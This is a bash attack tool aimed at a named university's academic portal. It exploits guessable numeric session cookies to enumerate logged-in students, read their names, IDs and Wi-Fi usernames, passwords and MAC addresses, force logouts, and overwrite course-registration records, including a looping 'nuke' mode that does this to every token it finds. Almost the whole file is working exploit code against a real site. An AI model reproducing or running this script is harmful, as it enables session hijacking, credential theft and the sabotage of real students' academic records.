#!/bin/bash

# Variables
URL="https://academics.feb.ugm.ac.id"
UA="Mozilla/5.0 (PLAYSTATION 3; 3.55)"

cat <<EOF
 ___  ___  ___  _    _    ___  ___  _  ___  ___  ___
/ __|| | ||   \| |_ | |_ | _ |/ __|| ||__ \| _ |/ __|
|__ ||__ || | || __||   || __||__ || || __|| __|| |
|___/|___/|_|_|\___/|_|_|\___||___/|_|\___|\___||_|
                  by Surya Handika

EOF

echo "Base URL  : $URL"
echo "User Agent: $UA"
echo ""

public_token()
{
	echo "Getting public token..."
	out=$(curl -A "$UA" -L --silent -D - $URL/index.php | grep id_pengunjung | sed -e 's/\(.*\)=//')
	if [ "$out" == "" ]; then
		echo "=> got empty response"
	else
		echo "=> current public token: $out"
	fi
}

public_scan()
{
	TOKEN=$1
	token_check $TOKEN
	echo "Scanning for active token, starting from $TOKEN"
	while true; do
		echo -n "[$TOKEN] "
		user_name $TOKEN
		TOKEN=$(expr $TOKEN + 1)
	done
}

user_view()
{
	TOKEN=$1
	token_check $TOKEN
	echo "[$TOKEN] Getting user details..."
	local fullname_string=$(user_name $TOKEN)
	local fullname=$(echo $fullname_string | sed 's/ (\(.*\)//')
	local userid=$(echo $fullname_string | sed -e 's/\(.*\) (//' -e 's/)//')
	echo "Name: $fullname"
	echo "ID: $userid"
	echo -n "Wi-Fi account: "
	user_wifi $TOKEN
}

token_check()
{
	TOKEN=$1
	regex='^[0-9]+$'
	if ! [[ $TOKEN =~ $regex ]]
	then
		echo "Error: Invalid token" >&2
	exit 1
	fi
}

user_logout()
{
	TOKEN=$1
	token_check $TOKEN
	echo "[$TOKEN] Forcing user logout..."
	curl -A "$UA" --silent -b "id_pengunjung=$TOKEN;AG1=0000%7C0000" $URL/index.php?logout=1
	if [ "$?" == "0" ]; then
		echo "=> logged out successfully"
	else
		echo "=> curl returned exit code $? instead of 0"
	fi
}

user_name()
{
	TOKEN=$1
	token_check $TOKEN
	out=$(curl -A "$UA" --silent -b "id_pengunjung=$TOKEN;AG1=10%7C1000" \
	$URL/index.php | \
	grep "<td align='center'><b>" | \
	sed -e "s/\(.*\)<td align='center'><b>//" -e "s/<br>/ (/" -e "s/<\/b><\/td>/)/")

	if [ "$out" == "" ]; then echo "null"; else echo $out; fi
}

nuke_krs()
{
	TOKEN=$1
	token_check $TOKEN
	echo "[DANGEROUS] Starting nuclear war..."
	while true; do
	echo "[$TOKEN] Getting user details..."
	local fullname_string=$(user_name $TOKEN)
	local userid=$(echo $fullname_string | sed -e 's/\(.*\) (//' -e 's/)//')
	if [ "$userid" == "null" ]; then
		echo "=> not found"
	else
		echo "=> found $userid"
		echo "[$TOKEN] Sending form data..."
		out=$(curl -A "$UA" --silent -b "id_pengunjung=$TOKEN;AG1=10%7C1000;MS=1000|19" \
		"$URL/index.php?MS=1000|19" --form hlm=1 --form niu="$userid" --form sesi="2013|2" --form blokmk="1" --form bypass_sks="" --form tmb="Record_KRS")
		if [ "$out" == "" ]; then echo "=> got empty response"; else echo "=> sent and got a reply"; fi
	fi
	TOKEN=$(expr $TOKEN + 1)
	done
}

user_destroy_krs()
{
	TOKEN=$1
	token_check $TOKEN
	echo "[$TOKEN] Getting user details..."
	local fullname_string=$(user_name $TOKEN)
	local userid=$(echo $fullname_string | sed -e 's/\(.*\) (//' -e 's/)//')
	if [ "$userid" == "null" ]; then
		echo "=> token is inactive"
	else
		echo "=> user: $fullname_string"
		echo "[$TOKEN] Sending form data..."
		out=$(curl -A "$UA" --silent -b "id_pengunjung=$TOKEN;AG1=10%7C1000;MS=1000|19" \
		"$URL/index.php?MS=1000|19" --form hlm=1 --form niu="$userid" --form sesi="2013|2" --form blokmk="1" --form bypass_sks="" --form tmb="Record_KRS")
		if [ "$out" == "" ]; then echo "=> got empty response"; else echo "=> sent and got a reply"; fi
	fi
}

user_wifi()
{
	TOKEN=$1
	token_check $TOKEN
	curl -A "$UA" --silent -b "id_pengunjung=$TOKEN;AG1=10%7C1000"  \
	"$URL/index.php?MS=1000|210" | \
	grep -E '<td class=a>.*Username|<td class=a>.*Password|<td class=a>.*MAC' | \
	sed -e 's/\(.*\)<td class=b>//' -e 's/<input\(.*\)//' -e 's/<\/td\(.*\)//' | \
	tr '\n' ' '
	echo ''
}

case "$1" in
	li | login )
		user_login $2
		;;
	lo | logout )
		user_logout $2
		;;
	sc | scan )
		public_scan $2
		;;
	to | token )
		public_token
		;;
	vi | view )
		user_view $2
		;;
	de | destroy )
		user_destroy_krs $2
		;;
	nu | nuke )
		nuke_krs $2
		;;
	* )
		echo "Invalid command: $1"
		exit 1
		;;
esac
